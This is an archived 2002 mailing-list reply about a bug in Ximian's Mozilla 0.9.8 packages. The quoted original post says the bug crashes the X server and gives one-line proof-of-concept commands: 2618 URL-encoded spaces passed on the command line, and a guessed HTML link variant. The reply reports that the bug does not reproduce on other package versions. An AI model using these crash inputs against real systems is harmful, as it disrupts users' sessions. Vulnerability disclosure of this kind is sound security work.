Vulnerability Development mailing list archives

Re: Ximian Mozilla: The 2618 Bug

From: NyQuist <NyQuist () ntlworld com>
Date: 17 Feb 2002 17:48:17 +0000

On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:

NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't
make it since this doesn't seem to affect a redhat itself, it affects
the mozilla packages distrbuted by Ximian:

The test system look like:

bash#~ rpm -qa | grep mozilla
mozilla-0.9.8-1.ximian.2
mozilla-mail-0.9.8-1.ximian.2
mozilla-xmlterm-0.9.8-1.ximian.2
mozilla-devel-0.9.8-1.ximian.2
nautilus-mozilla-1.0.6-ximian.4
mozilla-psm-0.9.8-1.ximian.2
kdebindings-kmozilla-2.1.1-1

This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the
the updates).


There is a bug in mozilla 0.9.8-1 which allows you
to Crash the X server.

I won't go into details I'll just show the proof
of concept.


exploit:

Local:
bash#~ mozilla `perl -e "print '%20' x 2618"`


Remote:
I haven't test this but i guess:

echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
./attack.html

perhaps using "img src" or java script...


Best Regards

-- 
/* 
Rodrigo Gutierrez                   <rodrigo () trustix com>
Trustix AS                         http://www.trustix.com 
*/

One one box: rpm -qa | grep mozilla
mozilla-chat-0.9.7-1
mozilla-mail-0.9.7-1
nautilus-mozilla-1.0.6-ximian.6
mozilla-0.9.7-1
mozilla-devel-0.9.7-1
mozilla-js-debugger-0.9.7-1
mozilla-psm-0.9.7-1
mozilla-dom-inspector-0.9.7-1

Results in "www.perl -e "print %20 x 2618".com could not be found (lol)
perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't
overflow perl.

On other box: rpm -qa | grep mozilla
nautilus-mozilla-1.0.6-ximian.6
mozilla-psm-0.9.8-2
mozilla-0.9.8-2
mozilla-devel-0.9.8-2

Results in same 'not found' error.

The attack.html (as per your script) results in "www.'perl not found".
So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in
0.9.8-2.

-- 
NyQuist | Matthew Hall -- NyQuist at ntlworld dot com 
Sig: Microsoft sells you Windows. Linux gives you the whole house.

Current thread:

Ximian Mozilla: The 2618 Bug Replugge [Rod] (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug Vadim Berezniker (Feb 17)
  - Re: Ximian Mozilla: The 2618 Bug Replugge [Rod] (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug NyQuist (Feb 17)
  - Re: Ximian Mozilla: The 2618 Bug NyQuist (Feb 17)